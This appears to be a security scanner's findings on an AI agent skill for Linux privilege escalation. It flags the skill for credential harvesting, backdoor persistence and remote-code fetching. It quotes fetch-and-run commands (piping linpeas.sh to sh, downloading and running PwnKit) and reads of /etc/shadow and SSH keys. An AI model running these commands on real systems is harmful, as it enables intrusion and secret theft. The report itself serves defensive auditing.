linux-privilege-escalation

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 0.90). The playbook explicitly instructs enumerating and printing sensitive secrets (e.g., cat /etc/shadow, env, ~/.mysql_history, id_rsa, config files) and copying keys/password hashes, which forces the agent to read and would likely cause secret values to appear verbatim in outputs — creating a high exfiltration risk.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This document is an explicit offensive playbook that provides step-by-step instructions for unauthorized Linux privilege escalation (SUID/SGID/capabilities, cron/NFS abuse, LD_PRELOAD, kernel exploits), credential harvesting, persistence (cron, SSH keys), remote access (reverse shells, docker host access), and data exfiltration — i.e., deliberate guidance to compromise systems and install backdoors.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's main workflow explicitly instructs fetching and running public, user-maintained resources (e.g., curl/wget of LinPEAS and linux-exploit-suggester from raw.githubusercontent, and cross-referencing GTFOBins at https://gtfobins.github.io/ in SKILL.md §10 and the Kernel Exploits Checklist), which are untrusted third‑party sources whose content the agent is expected to consume and that can materially alter subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes commands that fetch and execute remote scripts at runtime (for example: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh and curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit && ./PwnKit), which downloads and runs external code the playbook instructs operators to execute, so these URLs present a direct remote-code-execution risk.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill contains explicit, actionable instructions to obtain root (e.g., create SUID binaries, modify /etc/passwd and /etc/shadow, inject cron jobs, set LD_PRELOAD, add users/SSH keys, mount host via Docker), which directly modify and compromise the machine's state.